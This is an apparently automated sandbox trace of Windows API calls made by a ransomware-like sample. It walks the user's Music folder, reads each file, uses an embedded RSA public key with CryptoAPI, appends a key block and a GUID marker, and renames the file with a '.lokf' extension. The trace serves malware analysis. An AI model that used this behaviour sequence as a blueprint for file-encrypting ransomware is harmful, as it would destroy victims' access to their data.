HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a40 | out: hHeap=0x660000) returned 1 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a40 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85a28 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a40 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.976] GetCurrentThreadId () returned 0x9e0 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84f58 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.976] GetCurrentThreadId () returned 0x9e0 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a28 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a40 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a10 [0059.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.978] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8183, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.978] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.978] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.978] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.978] CloseHandle (hObject=0x5cc) returned 1 [0059.979] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\DgdvfX7vLuA3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\dgdvfx7vlua3.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\DgdvfX7vLuA3.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\dgdvfx7vlua3.m4a.lokf")) returned 1 [0059.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.980] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.980] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66899650, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x94658a70, ftLastAccessTime.dwHighDateTime=0x1d4d3de, ftLastWriteTime.dwLowDateTime=0x94658a70, ftLastWriteTime.dwHighDateTime=0x1d4d3de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iCD5MmspTIMUES", cAlternateFileName="ICD5MM~1")) returned 1 [0059.981] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17b88290, ftCreationTime.dwHighDateTime=0x1d4ce5f, ftLastAccessTime.dwLowDateTime=0x6b0dc390, ftLastAccessTime.dwHighDateTime=0x1d4c939, ftLastWriteTime.dwLowDateTime=0x6b0dc390, ftLastWriteTime.dwHighDateTime=0x1d4c939, nFileSizeHigh=0x0, nFileSizeLow=0xb5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OAddPqhDn.mp3", cAlternateFileName="OADDPQ~1.MP3")) returned 1 [0059.981] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\OAddPqhDn.mp3") returned=".mp3" [0059.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\OAddPqhDn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\oaddpqhdn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.981] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=2906) returned 1 [0059.981] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.983] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.983] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.984] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.984] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb5a, lpOverlapped=0x0) returned 1 [0059.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.984] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.985] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.985] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.985] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.985] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.985] GetLastError () returned 0x0 [0059.985] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.985] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.985] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.985] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.985] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb60) returned 0x9c778e8 [0059.985] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c887a8 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c887f0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a10 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a40 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a58 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.986] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a40 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a58 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a58 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85a40 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a58 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a40 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.987] GetCurrentThreadId () returned 0x9e0 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84fe8 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.987] GetCurrentThreadId () returned 0x9e0 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.987] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.987] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.987] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.988] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.988] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.988] CloseHandle (hObject=0x5cc) returned 1 [0059.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0059.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\OAddPqhDn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\oaddpqhdn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\OAddPqhDn.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\oaddpqhdn.mp3.lokf")) returned 1 [0059.989] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a6a55a0, ftCreationTime.dwHighDateTime=0x1d4c6b7, ftLastAccessTime.dwLowDateTime=0xbdddd1d0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0xbdddd1d0, ftLastWriteTime.dwHighDateTime=0x1d4d273, nFileSizeHigh=0x0, nFileSizeLow=0x8937, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zoG7hAdVK.wav", cAlternateFileName="ZOG7HA~1.WAV")) returned 1 [0059.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.990] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\zoG7hAdVK.wav") returned=".wav" [0059.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\zoG7hAdVK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\zog7hadvk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.990] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=35127) returned 1 [0059.990] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.992] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8911, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.992] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 